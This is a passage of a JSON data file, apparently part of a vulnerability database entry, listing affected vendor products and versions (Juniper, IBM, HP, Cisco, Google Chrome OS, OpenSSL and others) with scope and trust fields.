        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.6.1"
      },
      {
        "model": "cp1543-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "computer telephony integration object server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos 12.1r",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2.2"
      },
      {
        "model": "vsphere virtual disk development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "fortimanager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.7"
      },
      {
        "model": "laserjet p2055 printer series ce460a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20141201"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.35"
      },
      {
        "model": "ace application control engine module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datafort e-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "system type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3690x571471.43"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v2-480"
      },
      {
        "model": "i v5r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "junos 11.4r11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "proventia network security controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.470"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.5.4"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6.10"
      },
      {
        "model": "junos 12.1x46-d25",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "project openssl 1.0.0g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos space ja1500 appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.1.3"
      },
      {
        "model": "system type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3850x571431.43"
      },
      {
        "model": "clustered data ontap antivirus connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3"
      },
      {
        "model": "laserjet printer series q7543a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52008.241"
      },
      {
        "model": "proxyav",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.5"
      },
      {
        "model": "laserjet enterprise flow mfp m525c cf118a 2302963 436069",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.20"
      },
      {
        "model": "fortios b0537",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.8"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.06"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.0"
      },
      {
        "model": "laserjet enterprise m806 cz244a 2302963 436075",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.3"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "9.1-release-p15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "laserjet enterprise color m775 series cf304a 2302963 436079",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "fortirecorder",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "1.4.2"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.00"
      },
      {
        "model": "openvpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openvpn",
        "version": "2.3.3"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.32"
      },
      {
        "model": "laserjet enterprise mfp m525f cf117a 2302963 436069",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "laserjet enterprise color m775 series cc522a 2302963 436079",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.15"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.7"
      },
      {
        "model": "secure analytics 2013.2r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "vpn client v100r001c02spc702",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet enterprise color mfp m880 d7p70a 2302963 436068",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.6"
      },
      {
        "model": "laserjet pro color mfp m276n/nw cf145a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20020140919"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.1.100.3"
      },
      {
        "model": "api management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0"
      },
      {
        "model": "laserjet m9050 multifunction printer cc395a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.2"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x310025820"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0"
      },
      {
        "model": "junos 13.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.0"
      },
      {
        "model": "integrity superdome and hp converged system for sap hana",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "x9005.50.12"
      },
      {
        "model": "asset manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.3"
      },
      {
        "model": "algo one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.8"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1"
      },
      {
        "model": "sdn for virtual environments",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.2"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.5"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.5.1"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.1.2"
      },
      {
        "model": "manageone v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "tivoli endpoint manager for remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.1"
      },
      {
        "model": "power express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7400"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "tivoli workload scheduler distributed ga level",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2.0"
      },
      {
        "model": "snapprotect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "junos r8-s2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "color laserjet enterprise cp4525 cc495a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "10.0-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.49"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "oneview",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.10"
      },
      {
        "model": "laserjet enterprise mfp m725 cf069a 2302963 436078",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.0.1"
      },
      {
        "model": "storevirtual vsa software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12.6"
      },
      {
        "model": "prime access registrar appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "nvp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.2.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.1"
      },
      {
        "model": "algo one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7"
      },
      {
        "model": "database and middleware automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "tivoli netcool/system service monitor fp11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "tekelec hlr router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "open systems snapvault agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "agile controller v100r001c00spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "web security gateway anywhere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.7"
      },
      {
        "model": "laserjet p4515 cb515a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "laserjet pro mfp m425dn/dw cf286a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020140919"
      },
      {
        "model": "laserjet enterprise m712 series cf236a 2302963 436080",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "project openssl 1.0.0h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "mds switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smart update manager for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.3.5"
      },
      {
        "model": "idol speech software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1"
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.5.0.16091"
      },
      {
        "model": "laserjet enterprise color m551 series cf082a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.10"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.1"
      },
      {
        "model": "telepresence tx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.5.2"
      },
      {
        "model": "ftp server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cerberus",
        "version": "7.0.0.2"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.2.2"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.32"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.14"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "laserjet enterprise mfp m725 cf066a 2302963 436078",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.40"
      },
      {
        "model": "websphere mq",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.1.10"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.0"
      },
      {
        "model": "wx5002/5004 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "netscaler 9.3.e",
        "scope": null,
        "trust": 0.3,
        "vendor": "citrix",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.71"
      },
      {
        "model": "laserjet m9040 multifunction printer cc394a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51.256.1"
      },
      {
        "model": "updatexpress system packs installer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.61"
      },
      {
        "model": "usg5000 v300r001c10sph201",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.3"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "junos space 13.3r1.8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "proxyav",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.4"
      },
      {
        "model": "project openssl 0.9.8y",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "enterprise communications broker pcz2.0.0m4p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "sparc enterprise m4000 xcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1118"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "10.1"
      },
      {
        "model": "aura application server sip core pb23",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "vsr1000 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.33"
      },
      {
        "model": "asg2000 v100r001c10sph001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.130.14"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.14"
      },
      {
        "model": "wireless lan controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "junos r4-s2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.128.3"
      },
      {
        "model": "virtuozzo containers for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "4.6"
      },
      {
        "model": "laserjet p4015 cb526a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "laserjet enterprise mfp m630 series j7x28a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "laserjet p3005 printer series q7813a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.190.3"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.4"
      },
      {
        "model": "vsphere virtual disk development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "infosphere master data management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.24"
      },
      {
        "model": "vsm v200r002c00spc503",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.37"
      },
      {
        "model": "10.0-stable",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "710/7300"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.8"
      },
      {
        "model": "fortiauthenticator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.3"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.08"
      },
      {
        "model": "airwave",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "7.4"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "3.1.4"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "0"
      },
      {
        "model": "nextscale nx360 m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "54550"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.5"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.52"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "network connect 8.0r3.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system chassis management module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32200"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.8"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.4"
      },
      {
        "model": "security access manager for web appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "s5900 v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "watson explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0"
      },
      {
        "model": "p2000 g3 msa array system ts251p006",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "documentum content server p05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "7.1"
      },
      {
        "model": "laserjet printer series q5404a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "42508.250.2"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.5"
      },
      {
        "model": "jabber video for telepresence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1.2"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.5"
      },
      {
        "model": "flex system p270",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7954-24x)0"
      },
      {
